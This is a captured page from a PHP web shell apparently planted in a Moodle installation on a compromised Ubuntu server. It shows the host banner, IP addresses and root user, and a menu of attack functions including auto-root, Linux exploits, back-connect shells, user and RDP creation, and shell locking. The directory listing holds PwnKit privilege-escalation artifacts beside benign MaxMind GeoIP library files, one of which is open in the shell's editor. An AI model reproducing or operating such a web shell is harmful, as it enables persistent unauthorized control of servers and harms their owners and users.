Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
maxmind /
GeoIp2 /
Record /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AbstractPlaceRecord.php
1.2
KB
-rwxrwxrwx
AbstractRecord.php
1.28
KB
-rwxrwxrwx
City.php
1.02
KB
-rwxrwxrwx
Continent.php
1.04
KB
-rwxrwxrwx
Country.php
1.5
KB
-rwxrwxrwx
Location.php
2.06
KB
-rwxrwxrwx
MaxMind.php
400
B
-rwxrwxrwx
Postal.php
836
B
-rwxrwxrwx
RepresentedCountry.php
758
B
-rwxrwxrwx
Subdivision.php
1.45
KB
-rwxrwxrwx
Traits.php
6.03
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Subdivision.php
<?php namespace GeoIp2\Record; /** * Contains data for the subdivisions associated with an IP address. * * This record is returned by all location databases and services besides * Country. * * @property-read int|null $confidence This is a value from 0-100 indicating * MaxMind's confidence that the subdivision is correct. This attribute is * only available from the Insights service and the GeoIP2 Enterprise * database. * @property-read int|null $geonameId This is a GeoName ID for the subdivision. * This attribute is returned by all location databases and services besides * Country. * @property-read string|null $isoCode This is a string up to three characters long * contain the subdivision portion of the ISO 3166-2 code. See * https://en.wikipedia.org/wiki/ISO_3166-2. This attribute is returned by all * location databases and services except Country. * @property-read string|null $name The name of the subdivision based on the * locales list passed to the constructor. This attribute is returned by all * location databases and services besides Country. * @property-read array|null $names An array map where the keys are locale codes * and the values are names. This attribute is returned by all location * databases and services besides Country. */ class Subdivision extends AbstractPlaceRecord { /** * @ignore */ protected $validAttributes = [ 'confidence', 'geonameId', 'isoCode', 'names', ]; }
Close